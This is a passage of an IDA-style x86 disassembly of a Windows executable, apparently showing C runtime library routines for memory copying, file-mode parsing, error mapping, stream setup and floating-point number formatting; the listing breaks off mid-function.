; ---------------------------------------------------------------------------
align 4
dd offset loc_41B72C
dd offset loc_41B734
dd offset loc_41B73C
dd offset loc_41B744
dd offset loc_41B74C
dd offset loc_41B754
dd offset loc_41B75C
off_41B728 dd offset loc_41B76F ; DATA XREF: sub_41B490+1C6�r
; ---------------------------------------------------------------------------
loc_41B72C: ; DATA XREF: sub_41B490+27C�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_41B734: ; DATA XREF: sub_41B490+280�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_41B73C: ; DATA XREF: sub_41B490+284�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_41B744: ; DATA XREF: sub_41B490+288�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_41B74C: ; DATA XREF: sub_41B490+28C�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_41B754: ; DATA XREF: sub_41B490+290�o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_41B75C: ; DATA XREF: sub_41B490+294�o
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_41B76F: ; CODE XREF: sub_41B490+1C6�j
; DATA XREF: sub_41B490:off_41B728�o
jmp off_41B778[edx*4]
; ---------------------------------------------------------------------------
align 4
off_41B778 dd offset loc_41B788 ; DATA XREF: sub_41B490+1BB�r
; sub_41B490:loc_41B678�r ...
dd offset loc_41B790
dd offset loc_41B7A0
dd offset loc_41B7B4
; ---------------------------------------------------------------------------
loc_41B788: ; CODE XREF: sub_41B490+1BB�j
; sub_41B490:loc_41B678�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_41B790: ; CODE XREF: sub_41B490+1BB�j
; sub_41B490:loc_41B678�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_41B7A0: ; CODE XREF: sub_41B490+1BB�j
; sub_41B490:loc_41B678�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41B7B4: ; CODE XREF: sub_41B490+1BB�j
; sub_41B490:loc_41B678�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_41B490 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B7CD proc near ; CODE XREF: sub_417140+35�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, dword_4814B8
push edi
mov edi, [ebp+arg_4]
mov al, [edi]
xor ebx, ebx
cmp al, 61h
mov [ebp+var_8], ebx
mov [ebp+var_4], ebx
jz short loc_41B806
cmp al, 72h
jz short loc_41B7FF
cmp al, 77h
jnz loc_41B912
mov ecx, 301h
jmp short loc_41B80B
; ---------------------------------------------------------------------------
loc_41B7FF: ; CODE XREF: sub_41B7CD+21�j
xor ecx, ecx
or esi, 1
jmp short loc_41B80E
; ---------------------------------------------------------------------------
loc_41B806: ; CODE XREF: sub_41B7CD+1D�j
mov ecx, 109h
loc_41B80B: ; CODE XREF: sub_41B7CD+30�j
or esi, 2
loc_41B80E: ; CODE XREF: sub_41B7CD+37�j
xor edx, edx
inc edx
jmp loc_41B8ED
; ---------------------------------------------------------------------------
loc_41B816: ; CODE XREF: sub_41B7CD+125�j
cmp edx, ebx
jz loc_41B8F8
movsx eax, al
cmp eax, 54h
jg short loc_41B897
jz short loc_41B88A
sub eax, 2Bh
jz short loc_41B874
sub eax, 19h
jz short loc_41B86A
sub eax, 0Eh
jz short loc_41B856
dec eax
jnz loc_41B8CF
cmp [ebp+var_4], ebx
jnz loc_41B8CF
mov [ebp+var_4], 1
or ecx, 20h
jmp loc_41B8ED
; ---------------------------------------------------------------------------
loc_41B856: ; CODE XREF: sub_41B7CD+68�j
cmp [ebp+var_4], ebx
jnz short loc_41B8CF
mov [ebp+var_4], 1
or ecx, 10h
jmp loc_41B8ED
; ---------------------------------------------------------------------------
loc_41B86A: ; CODE XREF: sub_41B7CD+63�j
test cl, 40h
jnz short loc_41B8CF
or ecx, 40h
jmp short loc_41B8ED
; ---------------------------------------------------------------------------
loc_41B874: ; CODE XREF: sub_41B7CD+5E�j
test cl, 2
jnz short loc_41B8CF
and ecx, 0FFFFFFFEh
and esi, 0FFFFFFFCh
or ecx, 2
or esi, 80h
jmp short loc_41B8ED
; ---------------------------------------------------------------------------
loc_41B88A: ; CODE XREF: sub_41B7CD+59�j
mov eax, 1000h
test ecx, eax
jnz short loc_41B8CF
or ecx, eax
jmp short loc_41B8ED
; ---------------------------------------------------------------------------
loc_41B897: ; CODE XREF: sub_41B7CD+57�j
sub eax, 62h
jz short loc_41B8E2
dec eax
jz short loc_41B8CA
sub eax, 0Bh
jz short loc_41B8B6
sub eax, 6
jnz short loc_41B8CF
test ch, 0C0h
jnz short loc_41B8CF
or ecx, 4000h
jmp short loc_41B8ED
; ---------------------------------------------------------------------------
loc_41B8B6: ; CODE XREF: sub_41B7CD+D5�j
cmp [ebp+var_8], ebx
jnz short loc_41B8CF
mov [ebp+var_8], 1
and esi, 0FFFFBFFFh
jmp short loc_41B8ED
; ---------------------------------------------------------------------------
loc_41B8CA: ; CODE XREF: sub_41B7CD+D0�j
cmp [ebp+var_8], ebx
jz short loc_41B8D3
loc_41B8CF: ; CODE XREF: sub_41B7CD+6B�j
; sub_41B7CD+74�j ...
xor edx, edx
jmp short loc_41B8ED
; ---------------------------------------------------------------------------
loc_41B8D3: ; CODE XREF: sub_41B7CD+100�j
mov [ebp+var_8], 1
or esi, 4000h
jmp short loc_41B8ED
; ---------------------------------------------------------------------------
loc_41B8E2: ; CODE XREF: sub_41B7CD+CD�j
test ch, 0C0h
jnz short loc_41B8CF
or ecx, 8000h
loc_41B8ED: ; CODE XREF: sub_41B7CD+44�j
; sub_41B7CD+84�j ...
inc edi
mov al, [edi]
cmp al, bl
jnz loc_41B816
loc_41B8F8: ; CODE XREF: sub_41B7CD+4B�j
push 1A4h
push [ebp+arg_8]
push ecx
push [ebp+arg_0]
call sub_41FB6C
mov ecx, eax
add esp, 10h
cmp ecx, ebx
jge short loc_41B916
loc_41B912: ; CODE XREF: sub_41B7CD+25�j
xor eax, eax
jmp short loc_41B930
; ---------------------------------------------------------------------------
loc_41B916: ; CODE XREF: sub_41B7CD+143�j
mov eax, [ebp+arg_C]
inc dword_481318
mov [eax+0Ch], esi
mov [eax+4], ebx
mov [eax], ebx
mov [eax+8], ebx
mov [eax+1Ch], ebx
mov [eax+10h], ecx
loc_41B930: ; CODE XREF: sub_41B7CD+147�j
pop edi
pop esi
pop ebx
leave
retn
sub_41B7CD endp
; =============== S U B R O U T I N E =======================================
sub_41B935 proc near ; CODE XREF: sub_417140+18�p
; sub_417234+2B�p ...
call sub_41915F
add eax, 8
retn
sub_41B935 endp
; =============== S U B R O U T I N E =======================================
sub_41B93E proc near ; CODE XREF: sub_417234+36�p
; sub_41ADA6+8A�p ...
call sub_41915F
add eax, 0Ch
retn
sub_41B93E endp
; =============== S U B R O U T I N E =======================================
sub_41B947 proc near ; CODE XREF: sub_417234+16�p
; sub_418005+1D�p ...
arg_0 = dword ptr 4
push esi
call sub_41915F
mov ecx, [esp+4+arg_0]
mov [eax+0Ch], ecx
xor esi, esi
loc_41B956: ; CODE XREF: sub_41B947+1C�j
cmp ecx, dword_4328C0[esi*8]
jz short loc_41B97D
inc esi
cmp esi, 2Dh
jb short loc_41B956
cmp ecx, 13h
jb short loc_41B98E
cmp ecx, 24h
ja short loc_41B98E
call sub_41915F
mov dword ptr [eax+8], 0Dh
pop esi
retn
; ---------------------------------------------------------------------------
loc_41B97D: ; CODE XREF: sub_41B947+16�j
call sub_41915F
mov ecx, dword_4328C4[esi*8]
mov [eax+8], ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_41B98E: ; CODE XREF: sub_41B947+21�j
; sub_41B947+26�j
cmp ecx, 0BCh
jb short loc_41B9AC
cmp ecx, 0CAh
ja short loc_41B9AC
call sub_41915F
mov dword ptr [eax+8], 8
pop esi
retn
; ---------------------------------------------------------------------------
loc_41B9AC: ; CODE XREF: sub_41B947+4D�j
; sub_41B947+55�j
call sub_41915F
mov dword ptr [eax+8], 16h
pop esi
retn
sub_41B947 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B9BA proc near ; CODE XREF: sub_417140+C�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 10h
push offset stru_42C0F0
call __SEH_prolog
xor ebx, ebx
xor edi, edi
mov [ebp+var_1C], edi
push 1
call sub_41A166
pop ecx
mov [ebp+ms_exc.disabled], ebx
xor esi, esi
loc_41B9DA: ; CODE XREF: sub_41B9BA+85�j
mov [ebp+var_20], esi
cmp esi, dword_482940
jge loc_41BAA9
mov eax, dword_481920
mov eax, [eax+esi*4]
cmp eax, ebx
jz short loc_41BA45
test byte ptr [eax+0Ch], 83h
jnz short loc_41BA3E
cmp esi, 2
jle short loc_41BA17
cmp esi, 14h
jge short loc_41BA17
lea eax, [esi+10h]
push eax
call sub_41A0E7
pop ecx
test eax, eax
jz loc_41BAA9
loc_41BA17: ; CODE XREF: sub_41B9BA+44�j
; sub_41B9BA+49�j
mov eax, dword_481920
push dword ptr [eax+esi*4]
push esi
call sub_41B0C1
pop ecx
pop ecx
mov eax, dword_481920
mov eax, [eax+esi*4]
test byte ptr [eax+0Ch], 83h
jz short loc_41BA41
push eax
push esi
call sub_41B113
pop ecx
pop ecx
loc_41BA3E: ; CODE XREF: sub_41B9BA+3F�j
inc esi
jmp short loc_41B9DA
; ---------------------------------------------------------------------------
loc_41BA41: ; CODE XREF: sub_41B9BA+79�j
mov edi, eax
jmp short loc_41BAA6
; ---------------------------------------------------------------------------
loc_41BA45: ; CODE XREF: sub_41B9BA+39�j
shl esi, 2
push 38h
call sub_416DAF
pop ecx
mov ecx, dword_481920
mov [esi+ecx], eax
mov eax, dword_481920
mov eax, [esi+eax]
cmp eax, ebx
jz short loc_41BAA9
push 0FA0h
add eax, 20h
push eax
call sub_41EF60
pop ecx
pop ecx
test eax, eax
mov eax, dword_481920
jnz short loc_41BA91
push dword ptr [esi+eax]
call sub_416C97
pop ecx
mov eax, dword_481920
mov [esi+eax], ebx
jmp short loc_41BAA9
; ---------------------------------------------------------------------------
loc_41BA91: ; CODE XREF: sub_41B9BA+C2�j
mov eax, [esi+eax]
add eax, 20h
push eax
call dword_422018 ; RtlEnterCriticalSection
mov eax, dword_481920
mov edi, [esi+eax]
loc_41BAA6: ; CODE XREF: sub_41B9BA+89�j
mov [ebp+var_1C], edi
loc_41BAA9: ; CODE XREF: sub_41B9BA+29�j
; sub_41B9BA+57�j ...
cmp edi, ebx
jz short loc_41BABF
mov [edi+4], ebx
mov [edi+0Ch], ebx
mov [edi+8], ebx
mov [edi], ebx
mov [edi+1Ch], ebx
or dword ptr [edi+10h], 0FFFFFFFFh
loc_41BABF: ; CODE XREF: sub_41B9BA+F1�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41BAD3
mov eax, edi
call __SEH_epilog
retn
sub_41B9BA endp
; =============== S U B R O U T I N E =======================================
sub_41BAD0 proc near ; DATA XREF: .text:stru_42C0F0�o
mov edi, [ebp-1Ch]
sub_41BAD0 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41BAD3 proc near ; CODE XREF: sub_41B9BA+109�p
push 1
call sub_41A0D2
pop ecx
retn
sub_41BAD3 endp
; =============== S U B R O U T I N E =======================================
sub_41BADC proc near ; DATA XREF: sub_4171E5+1E�o
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
movsx eax, byte ptr [esi]
push eax
call sub_41795A
cmp eax, 65h
jmp short loc_41BAFB
; ---------------------------------------------------------------------------
loc_41BAEF: ; CODE XREF: sub_41BADC+20�j
inc esi
movsx eax, byte ptr [esi]
push eax
call sub_41E669
test eax, eax
loc_41BAFB: ; CODE XREF: sub_41BADC+11�j
pop ecx
jnz short loc_41BAEF
mov al, [esi]
mov cl, byte_432C98
mov [esi], cl
inc esi
loc_41BB09: ; CODE XREF: sub_41BADC+38�j
mov cl, [esi]
mov [esi], al
mov al, cl
mov cl, [esi]
inc esi
test cl, cl
jnz short loc_41BB09
pop esi
retn
sub_41BADC endp
; =============== S U B R O U T I N E =======================================
sub_41BB18 proc near ; DATA XREF: sub_4171E5+A�o
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push ebx
mov bl, byte_432C98
jmp short loc_41BB2A
; ---------------------------------------------------------------------------
loc_41BB25: ; CODE XREF: sub_41BB18+16�j
cmp cl, bl
jz short loc_41BB30
inc eax
loc_41BB2A: ; CODE XREF: sub_41BB18+B�j
mov cl, [eax]
test cl, cl
jnz short loc_41BB25
loc_41BB30: ; CODE XREF: sub_41BB18+F�j
mov cl, [eax]
inc eax
test cl, cl
jz short loc_41BB61
jmp short loc_41BB44
; ---------------------------------------------------------------------------
loc_41BB39: ; CODE XREF: sub_41BB18+30�j
cmp cl, 65h
jz short loc_41BB4A
cmp cl, 45h
jz short loc_41BB4A
inc eax
loc_41BB44: ; CODE XREF: sub_41BB18+1F�j
mov cl, [eax]
test cl, cl
jnz short loc_41BB39
loc_41BB4A: ; CODE XREF: sub_41BB18+24�j
; sub_41BB18+29�j
mov edx, eax
loc_41BB4C: ; CODE XREF: sub_41BB18+38�j
dec eax
cmp byte ptr [eax], 30h
jz short loc_41BB4C
cmp [eax], bl
jnz short loc_41BB57
dec eax
loc_41BB57: ; CODE XREF: sub_41BB18+3C�j
; sub_41BB18+47�j
mov cl, [edx]
inc eax
inc edx
test cl, cl
mov [eax], cl
jnz short loc_41BB57
loc_41BB61: ; CODE XREF: sub_41BB18+1D�j
pop ebx
retn
sub_41BB18 endp
; =============== S U B R O U T I N E =======================================
sub_41BB63 proc near ; DATA XREF: sub_4171E5+28�o
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
fld qword ptr [eax]
fcomp dbl_42C100
fnstsw ax
test ah, 1
jnz short loc_41BB7A
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_41BB7A: ; CODE XREF: sub_41BB63+11�j
xor eax, eax
retn
sub_41BB63 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BB7D proc near ; DATA XREF: sub_4171E5+14�o
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_0], 0
push [ebp+arg_8]
jz short loc_41BBA6
lea eax, [ebp+var_8]
push eax
call sub_41FEE5
mov eax, [ebp+arg_4]
pop ecx
pop ecx
mov ecx, [ebp+var_8]
mov [eax], ecx
mov ecx, [ebp+var_4]
mov [eax+4], ecx
leave
retn
; ---------------------------------------------------------------------------
loc_41BBA6: ; CODE XREF: sub_41BB7D+C�j
lea eax, [ebp+arg_0]
push eax
call sub_41FF28
mov eax, [ebp+arg_4]
pop ecx
pop ecx
mov ecx, [ebp+arg_0]
mov [eax], ecx
leave
retn
sub_41BB7D endp
; =============== S U B R O U T I N E =======================================
sub_41BBBB proc near ; CODE XREF: sub_41BBD8+23�p
; sub_41BCFA+45�p ...
test edi, edi
push esi
mov esi, eax
jz short loc_41BBD6
push esi
call sub_419D00
inc eax
push eax
push esi
add esi, edi
push esi
call sub_41EFF0
add esp, 10h
loc_41BBD6: ; CODE XREF: sub_41BBBB+5�j
pop esi
retn
sub_41BBBB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BBD8 proc near ; CODE XREF: sub_41BC86+5B�p
; sub_41BDFE+88�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_8], 0
push esi
mov esi, eax
jz short loc_41BC01
xor eax, eax
cmp [ebp+arg_0], eax
push edi
setnle al
xor ecx, ecx
cmp dword ptr [esi], 2Dh
setz cl
mov edi, eax
add ecx, ebx
mov eax, ecx
call sub_41BBBB
pop edi
loc_41BC01: ; CODE XREF: sub_41BBD8+A�j
cmp dword ptr [esi], 2Dh
mov eax, ebx
jnz short loc_41BC0E
mov byte ptr [ebx], 2Dh
lea eax, [ebx+1]
loc_41BC0E: ; CODE XREF: sub_41BBD8+2E�j
cmp [ebp+arg_0], 0
jle short loc_41BC25
lea ecx, [eax+1]
mov dl, [ecx]
mov [eax], dl
mov eax, ecx
mov cl, byte_432C98
mov [eax], cl
loc_41BC25: ; CODE XREF: sub_41BBD8+3A�j
xor ecx, ecx
cmp [ebp+arg_8], cl
push offset dword_42C108
setz cl
add ecx, eax
add ecx, [ebp+arg_0]
push ecx
call sub_41BF70
cmp [ebp+arg_4], 0
pop ecx
pop ecx
mov ecx, eax
jz short loc_41BC4A
mov byte ptr [ecx], 45h
loc_41BC4A: ; CODE XREF: sub_41BBD8+6D�j
mov eax, [esi+0Ch]
inc ecx
cmp byte ptr [eax], 30h
jz short loc_41BC81
mov eax, [esi+4]
dec eax
jns short loc_41BC5E
neg eax
mov byte ptr [ecx], 2Dh
loc_41BC5E: ; CODE XREF: sub_41BBD8+7F�j
inc ecx
cmp eax, 64h
jl short loc_41BC6E
cdq
push 64h
pop esi
idiv esi
add [ecx], al
mov eax, edx
loc_41BC6E: ; CODE XREF: sub_41BBD8+8A�j
inc ecx
cmp eax, 0Ah
jl short loc_41BC7E
cdq
push 0Ah
pop esi
idiv esi
add [ecx], al
mov eax, edx
loc_41BC7E: ; CODE XREF: sub_41BBD8+9A�j
add [ecx+1], al
loc_41BC81: ; CODE XREF: sub_41BBD8+79�j
mov eax, ebx
pop esi
pop ebp
retn
sub_41BBD8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BC86 proc near ; CODE XREF: sub_41BE9E+47�p
var_2C = byte ptr -2Ch
var_14 = dword ptr -14h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 2Ch
mov eax, dword_432A48
xor eax, [ebp+4]
push ebx
mov [ebp+var_4], eax
push esi
lea eax, [ebp+var_2C]
push eax
lea eax, [ebp+var_14]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+4]
push dword ptr [eax]
call sub_42009C
mov esi, [ebp+arg_8]
mov ebx, [ebp+arg_4]
lea eax, [ebp+var_14]
push eax
lea eax, [esi+1]
push eax
xor eax, eax
cmp [ebp+var_14], 2Dh
mov edx, ebx
setz al
xor ecx, ecx
test esi, esi
setnle cl
add edx, eax
add ecx, edx
push ecx
call sub_41FF6B
push 0
push [ebp+arg_C]
lea eax, [ebp+var_14]
push esi
call sub_41BBD8
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
add esp, 28h
pop esi
mov eax, ebx
pop ebx
call sub_41C526
leave
retn
sub_41BC86 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BCFA proc near ; CODE XREF: sub_41BD96+4F�p
; sub_41BDFE+75�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
mov esi, eax
mov eax, [esi+4]
dec eax
cmp [ebp+arg_8], 0
push edi
jz short loc_41BD27
cmp eax, [ebp+arg_4]
jnz short loc_41BD27
xor ecx, ecx
cmp dword ptr [esi], 2Dh
setz cl
add ecx, eax
add ecx, [ebp+arg_0]
mov eax, ecx
mov byte ptr [eax], 30h
and byte ptr [eax+1], 0
loc_41BD27: ; CODE XREF: sub_41BCFA+10�j
; sub_41BCFA+15�j
cmp dword ptr [esi], 2Dh
mov ebx, [ebp+arg_0]
jnz short loc_41BD33
mov byte ptr [ebx], 2Dh
inc ebx
loc_41BD33: ; CODE XREF: sub_41BCFA+33�j
mov eax, [esi+4]
xor edi, edi
inc edi
test eax, eax
jg short loc_41BD4A
mov eax, ebx
call sub_41BBBB
mov byte ptr [ebx], 30h
inc ebx
jmp short loc_41BD4C
; ---------------------------------------------------------------------------
loc_41BD4A: ; CODE XREF: sub_41BCFA+41�j
add ebx, eax
loc_41BD4C: ; CODE XREF: sub_41BCFA+4E�j
cmp [ebp+arg_4], 0
jle short loc_41BD8E
mov eax, ebx
call sub_41BBBB
mov al, byte_432C98
mov [ebx], al
mov esi, [esi+4]
inc ebx
test esi, esi
jge short loc_41BD8E
neg esi
cmp [ebp+arg_8], 0
jnz short loc_41BD75
cmp [ebp+arg_4], esi
jl short loc_41BD78
loc_41BD75: ; CODE XREF: sub_41BCFA+74�j
mov [ebp+arg_4], esi
loc_41BD78: ; CODE XREF: sub_41BCFA+79�j
mov edi, [ebp+arg_4]
mov eax, ebx
call sub_41BBBB
push edi
push 30h
push ebx
call sub_41E880
add esp, 0Ch
loc_41BD8E: ; CODE XREF: sub_41BCFA+56�j
; sub_41BCFA+6C�j
mov eax, [ebp+arg_0]
pop edi
pop esi
pop ebx
pop ebp
retn
sub_41BCFA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BD96 proc near ; CODE XREF: sub_41BE9E+1E�p
var_2C = byte ptr -2Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 2Ch
mov eax, dword_432A48
xor eax, [ebp+4]
push esi
mov [ebp+var_4], eax
lea eax, [ebp+var_2C]
push eax
lea eax, [ebp+var_14]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+4]
push dword ptr [eax]
call sub_42009C
mov esi, [ebp+arg_8]
lea eax, [ebp+var_14]
push eax
mov eax, [ebp+var_10]
add eax, esi
push eax
xor eax, eax
cmp [ebp+var_14], 2Dh
setz al
add eax, [ebp+arg_4]
push eax
call sub_41FF6B
push 0
push esi
push [ebp+arg_4]
lea eax, [ebp+var_14]
call sub_41BCFA
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
mov eax, [ebp+arg_4]
add esp, 28h
pop esi
call sub_41C526
leave
retn
sub_41BD96 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BDFE proc near ; CODE XREF: sub_41BE9E+34�p
var_2C = byte ptr -2Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 2Ch
mov eax, dword_432A48
xor eax, [ebp+4]
push ebx
push esi
mov [ebp+var_4], eax
push edi
lea eax, [ebp+var_2C]
push eax
lea eax, [ebp+var_14]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+4]
push dword ptr [eax]
call sub_42009C
mov esi, [ebp+var_10]
mov ebx, [ebp+arg_8]
xor eax, eax
dec esi
cmp [ebp+var_14], 2Dh
setz al
add eax, [ebp+arg_4]
mov edi, eax
lea eax, [ebp+var_14]
push eax
push ebx
push edi
call sub_41FF6B
mov eax, [ebp+var_10]
add esp, 1Ch
dec eax
cmp esi, eax
setl cl
cmp eax, 0FFFFFFFCh
jl short loc_41BE7A
cmp eax, ebx
jge short loc_41BE7A
test cl, cl
jz short loc_41BE6A
loc_41BE60: ; CODE XREF: sub_41BDFE+67�j
mov al, [edi]
inc edi
test al, al
jnz short loc_41BE60
and [edi-2], al
loc_41BE6A: ; CODE XREF: sub_41BDFE+60�j
push 1
push ebx
push [ebp+arg_4]
lea eax, [ebp+var_14]
call sub_41BCFA
jmp short loc_41BE8B
; ---------------------------------------------------------------------------
loc_41BE7A: ; CODE XREF: sub_41BDFE+58�j
; sub_41BDFE+5C�j
push 1
push [ebp+arg_C]
lea eax, [ebp+var_14]
push ebx
mov ebx, [ebp+arg_4]
call sub_41BBD8
loc_41BE8B: ; CODE XREF: sub_41BDFE+7A�j
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
add esp, 0Ch
pop edi
pop esi
pop ebx
call sub_41C526
leave
retn
sub_41BDFE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BE9E proc near ; DATA XREF: sub_4171E5�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
cmp [ebp+arg_8], 65h
jz short loc_41BED9
cmp [ebp+arg_8], 45h
jz short loc_41BED9
cmp [ebp+arg_8], 66h
jnz short loc_41BEC6
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41BD96
add esp, 0Ch
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41BEC6: ; CODE XREF: sub_41BE9E+13�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41BDFE
jmp short loc_41BEEA
; ---------------------------------------------------------------------------
loc_41BED9: ; CODE XREF: sub_41BE9E+7�j
; sub_41BE9E+D�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41BC86
loc_41BEEA: ; CODE XREF: sub_41BE9E+39�j
add esp, 10h
pop ebp
retn
sub_41BE9E endp
; =============== S U B R O U T I N E =======================================
sub_41BEEF proc near ; CODE XREF: sub_41721D+F�p
push 30000h
push 10000h
call sub_420269
pop ecx
pop ecx
retn
sub_41BEEF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BF01 proc near ; CODE XREF: sub_41BF41:loc_41BF65�j
var_18 = qword ptr -18h
var_10 = qword ptr -10h
var_8 = qword ptr -8
push ebp
mov ebp, esp
sub esp, 18h
fld dbl_42C120
fstp [ebp+var_8]
fld dbl_42C118
fstp [ebp+var_10]
fld [ebp+var_10]
fdiv [ebp+var_8]
fmul [ebp+var_8]
fsubr [ebp+var_10]
fstp [ebp+var_18]
fld [ebp+var_18]
fcomp dbl_42C110
fnstsw ax
test ah, 41h
jnz short loc_41BF3D
xor eax, eax
inc eax
leave
retn
; ---------------------------------------------------------------------------
loc_41BF3D: ; CODE XREF: sub_41BF01+35�j
xor eax, eax
leave
retn
sub_41BF01 endp
; =============== S U B R O U T I N E =======================================
sub_41BF41 proc near ; CODE XREF: sub_41721D+5�p
push offset aKernel32 ; "KERNEL32"
call dword_4220A4 ; GetModuleHandleA
test eax, eax
jz short loc_41BF65
push offset aIsprocessorfea ; "IsProcessorFeaturePresent"
push eax
call dword_422084 ; GetProcAddress
test eax, eax
jz short loc_41BF65
push 0
call eax
retn
; ---------------------------------------------------------------------------
loc_41BF65: ; CODE XREF: sub_41BF41+D�j
; sub_41BF41+1D�j
jmp sub_41BF01
sub_41BF41 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_41BF70 proc near ; CODE XREF: sub_417456+F5�p
; sub_41BBD8+60�p ...
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
jmp short loc_41BFE5
sub_41BF70 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_41BF80 proc near ; CODE XREF: sub_41D8F7+10B�p
; sub_41D8F7+116�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_0]
push edi
test ecx, 3
jz short loc_41BFA0
loc_41BF8D: ; CODE XREF: sub_41BF80+1C�j
mov al, [ecx]
add ecx, 1
test al, al
jz short loc_41BFD3
test ecx, 3
jnz short loc_41BF8D
mov edi, edi
loc_41BFA0: ; CODE XREF: sub_41BF80+B�j
; sub_41BF80+36�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_41BFA0
mov eax, [ecx-4]
test al, al
jz short loc_41BFE2
test ah, ah
jz short loc_41BFDD
test eax, 0FF0000h
jz short loc_41BFD8
test eax, 0FF000000h
jz short loc_41BFD3
jmp short loc_41BFA0
; ---------------------------------------------------------------------------
loc_41BFD3: ; CODE XREF: sub_41BF80+14�j
; sub_41BF80+4F�j
lea edi, [ecx-1]
jmp short loc_41BFE5
; ---------------------------------------------------------------------------
loc_41BFD8: ; CODE XREF: sub_41BF80+48�j
lea edi, [ecx-2]
jmp short loc_41BFE5
; ---------------------------------------------------------------------------
loc_41BFDD: ; CODE XREF: sub_41BF80+41�j
lea edi, [ecx-3]
jmp short loc_41BFE5
; ---------------------------------------------------------------------------
loc_41BFE2: ; CODE XREF: sub_41BF80+3D�j
lea edi, [ecx-4]
loc_41BFE5: ; CODE XREF: sub_41BF70+5�j
; sub_41BF80+56�j ...
mov ecx, [esp+4+arg_4]
test ecx, 3
jz short loc_41C00E
loc_41BFF1: ; CODE XREF: sub_41BF80+85�j
mov dl, [ecx]
add ecx, 1
test dl, dl
jz short loc_41C060
mov [edi], dl
add edi, 1
test ecx, 3
jnz short loc_41BFF1
jmp short loc_41C00E
